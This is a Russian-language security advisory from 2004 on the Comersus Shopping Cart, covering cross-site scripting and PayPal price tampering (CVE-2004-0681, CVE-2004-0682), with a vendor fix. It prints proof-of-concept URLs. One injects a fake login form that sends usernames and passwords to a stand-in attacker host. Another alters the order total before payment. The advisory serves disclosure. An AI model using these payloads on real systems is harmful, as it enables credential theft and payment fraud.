Несколько уязвимостей в Comersus

Дата публикации:
08.07.2004
Дата изменения:
17.10.2006
Всего просмотров:
1041
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2004-0681
CVE-2004-0682
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Неавторизованное изменение данных
Обход ограничений безопасности
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Comersus Shopping Cart 4.x
Comersus Shopping Cart 5.x
Уязвимые версии: Comersus 5.09

Описание: Несколько уязвимостей обнаружено в Comersus. Удаленный пользователь может выполнить XSS нападение и изменять цену покупки.

1. XSS:

ttp://[VICTIM]/comersus/store/comersus_message.asp?message=<meta%20http-equiv='refresh'content='0'> 

http://[VICTIM]/comersus/store/comersus_message.asp? message=<form%20action="
http://www.evilhacker.com/save2db.asp"%20method="post">Username:<input%20nam
e="username"%20type="text"%20maxlength="30"><br>Password:<input%20 name="pass
word"%20type="text"%20maxlength="30"><br><input%20name="login"%20type="submi
t"%20value="Login"></form>

http://[VICTIM]/comersus/backofficeLite/comersus_b ackoffice_message.asp?message=<script>alert("VULNERABLE_TO_XSS")</script>
2. Удаленный пользователь может изменять цену покупки, перед оплатой товара через PayPal.
http://[VICTIM]/comersus/store/comersus_gatewayPayPal.asp?idOrder=2002&Order
Total=|102|222|228|22|130|36| 209&name=Thomas&lastName=Ryan&address=123+Easy+
Modify+Street&city=New+York&state=NY&zip=10001&country=US&phone=212%2D857%2D
1731&email=tommy%40providesecurity%2Ecom&or derDetails=1x+%23RDHT%2F11+Red+Ha
t+Deluxe+WorkStation+Options%3A+%3D+%2479%2E00%0D%0A2x+%23WME%2F1+Windows+Mi
llennium+Edition+Options%3A+%3D+%24398%2E00%0D%0A1x+%23BP RES2%2F6+So+You+Wan
t+to+Be+President%3F+Options%3A+%3D+%2414%2E39%0D%0A

URL производителя: http://www.comersus.com/

Решение: Установите обновленную версию программы (5.098): http://www.comersus.com/download.html

Ссылки: Comersus Cart Cross-Site Scripting Vulnerability
Comersus Cart Improper Request Handling

или введите имя

CAPTCHA